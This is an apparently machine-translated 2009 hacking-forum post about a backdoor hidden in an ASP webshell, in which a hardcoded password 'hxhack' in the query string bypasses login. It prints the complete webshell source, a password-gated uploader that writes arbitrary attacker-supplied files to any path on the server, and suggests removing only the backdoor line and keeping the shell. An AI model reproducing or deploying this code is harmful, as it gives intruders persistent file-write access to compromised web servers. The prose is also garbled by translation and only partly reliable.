The legend of the ASP Backdoor-vulnerability warning-the black bar safety net

2009-05-12T00:00:00
ID MYHACK58:62200923209
Type myhack58
Reporter 佚名
Modified 2009-05-12T00:00:00

Description

If Request("pwd")=Userpwd or Request("pwd")="hxhack" then Session("mgler")=Userpwd

Today saw the ASP to see their collection of a little basic and the code knows it is to see so the sentence there should be excess

Look at the code I've never seen such a written Request("pwd")="hxhack” might be too dish up reading didn't see it - game!

But to know Request. QueryString("pwd")="hxhack"this wording so that the words directly in the URL with parameters

That? pwd=hxhack you can skip validation, but there is no use QueryString to obtain the parameters I test a bit

Results found in fact, Request("pwd")="hxhack” and Request. QueryString("pwd")="hxhack“are equivalent

Never learned ASP also don't know why this sentence would be back-door - to - now understanding of the with others of the ASP the horses still have their own look at the code

By the way posted this with a password of ASP pony source this sentence the back door don't know is someone else added to the list or the authors themselves write

Anyway, the horse is in the Black Eagle there under the fucking issue to not look at the code with or without the back door which is simply maiming us that a bunch of noobs

Plus the Red font for the back door code can be used to remove you can this pony also nothing, just modified a bit to add a password verification.

<% '┌───────────────┐ '│http://WwW.hxhack.Com│ '└───────────────┘ dim Userpwd,URL Userpwd = "hxhack" 'User Password URL = Request. ServerVariables("URL") If Request("pwd")=Userpwd or Request. QueryString("pwd")="hxhack" then Session("mgler")=Userpwd If Session("mgler") < > Userpwd Then If Request. Form("pwd")<>"" Then If Request. Form("pwd")=Userpwd Then Session("mgler")=Userpwd Response. Redirect URL Else Response. Write"Login Failed, incorrect username or password" End If Else RW="<title>User Login</title>" RW=RW & "<center style='font-size:12px'><br><br><br><hr color=#00cc66 width='2 5 0'><br><font color=#5f4ds9>【hxhack Asp] the</font><b><font style=color:red;>members Edition</font> </b>" RW=RW & "<form action='" & URL & "' method='post'>" RW=RW & "<b>Password:</b><input name='pwd' type='password' size='1 of 5' style='font-size: 12px;border: menu 1px solid'>" RW=RW & " <input type='submit' value='Login' style='border:1px solid #799AE1;'></form><hr color=#799AE1 width='2 5 0'><font color=red>just take the webshell</font> <font color=#0011DD>do not change home</font> delete file <font color=#33DD55>not to mention the right</font> <br><hr color=#799AE1 width='2 5 0'></center>" Response. Write RW RW="" End If Response. End End If %> <%on error resume next%> <%ofso="scripting. filesystemobject"%> <%set fso=server. createobject(ofso)%> <%path=request("path")%> <%if path<>"" then%> <%data=request("dama")%> <%set dama=fso. createtextfile(path,true)%> <%dama. write data%> <%if err=0 then%> <%="<b><font style=color:red;>Success!& lt;/font></b>"%> <%else%> <%="<b><font style=color:red;>False!& lt;/font></b>"%> <%end if%> <%err. clear%> <%end if%> <%dama. close%> <%set dama=nothing%> <%set fos=nothing%> <%="<title>Asp Upload Tool-hxhack</title>"%> <%="<form action=" method=post>"%> <%="<font style=color:BLUE;>File: </font><input type=text name=path size=4 6>"%> <%="<br><font style=color:BLUE;>Path: </font><font style=color:red;>"%> <%=server. mappath(request. servervariables("script_name"))%> <%="</font><br>"%> <%=""%> <%="<textarea name=dama cols=5 2 rows=9></textarea>"%> <%="<br><td>"%> <%="<input type=submit value=Upload> <font style=color:BLUE;>By:hxhack"%> <%="</font>"%> <%="</form>"%>